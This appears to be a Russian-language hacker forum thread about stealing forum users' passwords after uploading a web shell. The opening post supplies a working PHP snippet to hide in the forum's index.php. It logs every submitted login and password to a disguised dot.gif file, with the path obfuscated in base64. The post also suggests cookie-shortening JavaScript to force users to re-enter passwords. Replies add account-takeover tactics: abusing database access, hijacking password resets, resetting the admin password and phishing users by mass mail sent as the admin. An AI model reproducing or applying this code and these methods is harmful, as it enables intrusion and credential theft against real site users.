Хочу рассказать о том , как можно узнать пассы юзверей форума, предварительно залив на него шелл, даже если ваш шелл найдуд и захреначат, то у вас будет шанс подсмотреть пасс админа ... если ваш троянец останется в скриптах форума ! Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить ! Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ? Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум... ПАЛЕВО !!!! скажите -) Да нет -) Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -) Итак, есть файлик и в него будем сейвить пасы ) Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ... PHP: $patch_ = getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9kb3QuZ2lm'); $patch_ = str_replace("\\","/",$patch_); if(isset($_POST['user']) != '' && isset($_POST['passwrd']) != '') { $f_l = fopen($patch_,'a+'); fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n"); fclose($f_l); } этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. ) После него вставляем сам скрипт ! Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет. Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля ! Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно )) А что если юзверь авторизуется через куки и пасс вообще не вводит ? Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев ) Но и на таких есть управа -) Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете... Удачи вам в вашем нелёгком, но я думаю правильном направлении !
а ещё можно через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d а ещё можно сменить временно пас админа который не брутиться ( опять же шелл в помошь ) залезть в панель админа форума, если есть возможность увидеть пас в открытом виде узверя который так сволочь тебе нужен аж ппц то всё чисто-гладко, если не видно - то ты как наделённый правами админа шлёшь письмо от лица администратора письмо тому горемыки, чтоб он вражина в срочном порядке подтвердил что он не забыл свой пас и выслал его тебе на мыло в подтверждение - можно сделать массовую рассылку :d P.s. у многих в подписе вижу: КУПЛЮ ШЕЛЛ С ВОЗМОЖНОСТЬЮ ЗАПИСИ В ИНДЕКС - что значит, другие варианты пролетают, шеллы ваши мы не купим. А что мешает проделать тоже самое ( о чём не сложно догадаться ) на том шелле где нет прав на редактирования файла? Ничего! Временная смена паса админу через мускуль (ну если тока речь не идёт об авторизации по Ip ) - заход в админку (правда я встречал такие админки, что как обычным юзером себя чувствуешь - минимализм ) - и меняй что те нуно.... ИМХО в 80% случаев это проканает на ура.
Там эта фишка работает с мускулем и создаёт там левое табло, которое спалят (ИМХО) быстрей, чем неприметную картинку на серваке ...
Ну шел можно взять например от маднета... а как залить его на IPB смотри ТУТ , версия не совпадает но можно попробывать.
да ладно, это ж как он ретривнется, если в бд он в хеше хранится? точно не помню, но пасс полюбому новый присылается рандомный.
а невориант посмотреть с конфиге логин и пас к мускул зайти в неё через шел и там посмотреть все пасы пользователей? но при этом открыть страницу md5.xek.cc
Способ не оч хороший…или не доработанный …записи идут где пароли звёздочками закрыты ..где кодировка левая…..
А я вот и думаю от чего он так, скрипт то сработает, то фигню запишет ... может это жабаскрипт в форуме всё портит ? пока не разобрался
Когда я пытался сделать тоже самое не уровне бд получалось то же самое, ява не виновата, походу это что-то связанное с сессиями/куками
а если пасс будет например ][Ott@быч твой md5.xek.cc будет брутить его вечно) по поводу кук, я с Smf не сталкивался но скорей всего можно просто уменьшить время существования сессии.
Сори за флуд Скажите пожалуйста, что такое "шелл" и "хеш" ??? и если можно, дайте ссыль на расшифровку подобных сокращений )) заранее спасибо!